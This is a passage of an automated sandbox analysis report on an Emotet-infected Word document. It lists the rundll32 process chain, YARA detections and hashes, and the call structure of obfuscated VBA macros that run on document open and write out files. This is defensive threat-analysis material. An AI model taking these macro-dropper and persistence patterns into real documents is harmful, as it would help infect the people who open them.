                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2932 Parent PID: 2712

                                                    General

                                                    Start time:08:36:50
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2109344000.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2488 Parent PID: 2932

                                                    General

                                                    Start time:08:36:51
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111186351.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2904 Parent PID: 2488

                                                    General

                                                    Start time:08:36:51
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2112888635.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2856 Parent PID: 2904

                                                    General

                                                    Start time:08:36:52
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2408 Parent PID: 2856

                                                    General

                                                    Start time:08:36:53
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2118847844.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 3052 Parent PID: 2408

                                                    General

                                                    Start time:08:36:55
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347931935.0000000000200000.00000040.00000001.sdmp, Author: Joe Security

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    VBA Code

                                                    Call Graph

                                                    Graph

                                                    Module: A5gd21klfqu9c6rs

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "A5gd21klfqu9c6rs"

                                                    2

                                                    Attribute VB_Base = "1Normal.ThisDocument"

                                                    3

                                                    Attribute VB_GlobalNameSpace = False

                                                    4

                                                    Attribute VB_Creatable = False

                                                    5

                                                    Attribute VB_PredeclaredId = True

                                                    6

                                                    Attribute VB_Exposed = True

                                                    7

                                                    Attribute VB_TemplateDerived = True

                                                    8

                                                    Attribute VB_Customizable = True

                                                    Executed Functions
                                                    Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503
                                                    APIsMeta Information

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

                                                    LineInstructionMeta Information
                                                    9

                                                    Private Sub Document_open()

                                                    10

                                                    G8xesq0b8jlsfrsp

                                                    executed
                                                    11

                                                    End Sub

                                                    Module: Owppnp8hah4xo788

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "Owppnp8hah4xo788"

                                                    Executed Functions
                                                    Function G8xesq0b8jlsfrsp, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195
                                                    APIsMeta Information

                                                    Zw1k7hcmdl66

                                                    Item

                                                    Hyii7r76oq89

                                                    diCXTi

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    NZiApKAp

                                                    Close

                                                    vrYYHIDxI

                                                    gzTFLxb

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    PjNhJNA

                                                    Close

                                                    oAaNlB

                                                    sySRJ

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    UwyYSBsBN

                                                    Close

                                                    tpOgXmm

                                                    MHYlQAD

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

